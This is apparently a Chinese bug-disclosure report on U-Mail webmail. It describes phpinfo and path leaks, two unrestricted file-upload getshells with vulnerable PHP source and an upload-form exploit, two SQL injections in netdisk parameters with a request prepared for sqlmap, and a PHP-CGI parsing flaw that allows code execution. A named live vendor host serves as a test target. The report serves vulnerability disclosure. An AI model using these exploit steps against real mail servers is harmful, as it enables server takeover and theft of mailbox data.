U-mail 最新版漏洞大阅兵(信息泄露，多个getshell，多处SQL注入漏洞，远程代码执行)

### 简要描述： 疯狗、 xsser finger求打雷 ### 详细说明： 注：一个getshell重复 http://wooyun.org/bugs/wooyun-2014-059954 疯狗、 xsser finger求打雷 1、 信息泄露 (phpinfo信息泄露) http://www.xxx.com/webmail/client/mail/index.php?module=test&action=info phpinfo()信息泄露 ``` 其中源码如下：WorldClient\html\client\mail\module\info.php if ( !defined( "PRELOAD_OK" ) ) { exit( "error" ); } require_once( LIB_PATH."Mailbox.php" ); require_once( LIB_PATH."Widget.php" ); $Mailbox = Mailbox::getinstance( ); $Widget = Widget::getinstance( ); $Domain = Domain::getinstance( ); $email = get_session( "email" ); $user_id = get_session( "user_id" ); $domain_id = get_session( "domain_id" ); phpinfo( ); ?> ``` Exp: http://mail.comingchina.com/webmail/client/mail/index.php?module=test&action=info 官方测试截图如下： [<img src="https://images.seebug.org/upload/201405/25121849661f2c77dd11bc530d8ea74ad598cc27.jpg" alt="5)4IS377`{(%C793DC[3FQ0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25121849661f2c77dd11bc530d8ea74ad598cc27.jpg) 2、 信息泄露（phpinfo） 在根目录当中有info.php该文件…. 地址为：http://mail.comingchina.com/webmail/info.php [<img src="https://images.seebug.org/upload/201405/251219338312683176b642eb4d4c9c508a6ba9c5.jpg" alt="$H}~ZB7%(Y0SA4WZR)D89OS.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251219338312683176b642eb4d4c9c508a6ba9c5.jpg) 3、 网站物理路径信息泄露 http://mail.comingchina.com/webmail/customer/autoresp.php http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-packdown [<img src="https://images.seebug.org/upload/201405/2512200733e8f2152e3e47bcb94636f3c581fcc7.jpg" alt="MN~~5D2%FE09}V`O]1TO723.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512200733e8f2152e3e47bcb94636f3c581fcc7.jpg) [<img src="https://images.seebug.org/upload/201405/251221311465e12d4c50c8bcb76de8f2e1866c81.jpg" alt="(GF`HJIA`TC_G[)N(0@XM)F.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251221311465e12d4c50c8bcb76de8f2e1866c81.jpg) 4、 任意文件上传getshell http://192.168.56.128/webmail/client/mail/index.php?module=operate&action=attach-upload WorldClient\html\client\mail\module\o_attach.php中 ``` if ( ACTION == "attach-upload" ) { if ( $_FILES ) { $file_name = $_FILES['Filedata']['name']; $file_type = $_FILES['Filedata']['type']; $file_size = $_FILES['Filedata']['size']; $file_source = $_FILES['Filedata']['tmp_name']; $file_suffix = getfilenamesuffix( $file_name ); //取后缀名 $path_target = getusercachepath( ); do { $file_id = makerandomname( ); $file_target = $path_target.$file_id.".".$file_suffix; } while ( file_exists( $file_target ) ); if ( !move_uploaded_file( $file_source, $file_target ) ) //未进行任何判断，直接写入了。。。。 { dump_json( array( "status" => 0, "message" => el( "写入文件出错，请与管理员联系！", "" ) ) ); } $_SESSION[SESSION_ID]['attach_cache'][] = array( "id" => $file_id, "name" => $file_name, "type" => "1", "path" => $file_target, "size" => $file_size ); dump_json( array( "status" => "1", "filename" => $file_name, "filesize" => $file_size, "file_id" => $file_id ) ); } ``` 在上传之后，他会返回地址，如 "file_id" => $file_id 其中就将上传之后的文件名给回显出来了。。 [<img src="https://images.seebug.org/upload/201405/25122220983218090934ff7fb953b3201769ff69.jpg" alt="4C[XVJVT0@8{Q`_H8XHF`{V.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25122220983218090934ff7fb953b3201769ff69.jpg) 我们访问下我们的马 [<img src="https://images.seebug.org/upload/201405/25122249f909d5d86b52bec5740843e017bc9ab6.jpg" alt="4SFA9(ZSQG(67)S_4X6EGXD.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25122249f909d5d86b52bec5740843e017bc9ab6.jpg) Exp 如下： ``` <form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/webmail/client/mail/index.php?module=operate&action=attach-upload-batch" method="post">Upload a new file: <input type="file" name="Filedata" size="50"> <input type="submit" value="Upload"> ``` 5、 任意文件上传getshell 之二 http://www.xxx.com/webmail/client/mail/index.php?module=operate&action=attach-upload-batch 其中只是多了个数组判断类型，也是同样方法getshell 6、 SQL注入漏洞一 http://192.168.56.128/webmail/client/netdisk/index.php?module=operate&action=move&fid=3&file=1 代码如下： ``` $Netdisk->initTreeObject( $user_id, 0 ); if ( ACTION == "move" ) { $file_ids = gss( $_GET['file'] ); //无过滤，直接进入了 $folder_ids = gss( $_GET['folder'] ); $folder_id = gss( $_GET['fid'] ); if ( !$folder_id ) { dump_json( array( "status" => 0, "message" => "参数错误！" ) ); } if ( $file_ids ) { $where = "user_id='".$user_id."' AND file_id IN (".$file_ids.")"; //传进来了，产生SQL注入漏洞 $data = array( "folder_id" => $folder_id ); $result = $Netdisk->update_file( $data, $where, 0 ); if ( !$result ) { dump_json( array( "status" => 0, "message" => "移动文件时发生错误，移动失败！" ) ); } } ``` 抓包，然后放sqlmap当中 ``` GET /webmail/client/netdisk/index.php?module=operate&action=move&fid=3&file=1 HTTP/1.1 Host: mail.comingchina.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=9c6ff50907e53333c9b81264c6ea0ef8 Connection: keep-alive ``` [<img src="https://images.seebug.org/upload/201405/25122414344b8e665df088761b7f658d6f9dc3ae.jpg" alt="BXV%L(HPE6[4]E)4(63]L7S.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25122414344b8e665df088761b7f658d6f9dc3ae.jpg) 下面是官方的数据库列表如下： [<img src="https://images.seebug.org/upload/201405/251224556e7804373cf65b2b8b22368358ff6746.jpg" alt="KF7U3CE{~}YW4)PNWUH(P8W.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251224556e7804373cf65b2b8b22368358ff6746.jpg) 7、 SQL注入漏洞二 http://192.168.56.128/webmail/client/netdisk/index.php?module=operate&action=move&fid=3& folder=1 此次SQL注入参数为：folder ``` if ( $folder_ids ) { $where = "user_id='".$user_id."' AND folder_id IN (".$folder_ids.")"; //同理 $data = array( "parent_id" => $folder_id ); $result = $Netdisk->update_folder( $data, $where, 0 ); if ( !$result ) { dump_json( array( "status" => 0, "message" => "移动文件夹时发生错误，移动失败！" ) ); } } ``` 同理SQL注入漏洞 8、 远程代码执行漏洞 由于该邮件系统采用的是php+mysql架构而成，而运行php的方式是采用了fast-cgi的方式，如图： [<img src="https://images.seebug.org/upload/201405/2512255611c4261653faaed461185bca0c64bb35.jpg" alt="891@TE0)L4C[ZMWFB8WE[%B.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512255611c4261653faaed461185bca0c64bb35.jpg) 采用该方式，PHP-CGI远程任意代码执行漏洞 其中任意文件可导致以php方式解析，类似于（nigx） 如http://www.xxx.com/1.jpg/1.php [<img src="https://images.seebug.org/upload/201405/251226279d849beafffd44513743cb2d1c607e26.jpg" alt="X~`VS%3V`W1K3(R2YE3MP)S.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251226279d849beafffd44513743cb2d1c607e26.jpg) 只要上传任意一文件，都可导致代码执行。。。直接getshell 发了这么多，能打个雷么？ ### 漏洞证明： [<img src="https://images.seebug.org/upload/201405/251226279d849beafffd44513743cb2d1c607e26.jpg" alt="X~`VS%3V`W1K3(R2YE3MP)S.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251226279d849beafffd44513743cb2d1c607e26.jpg)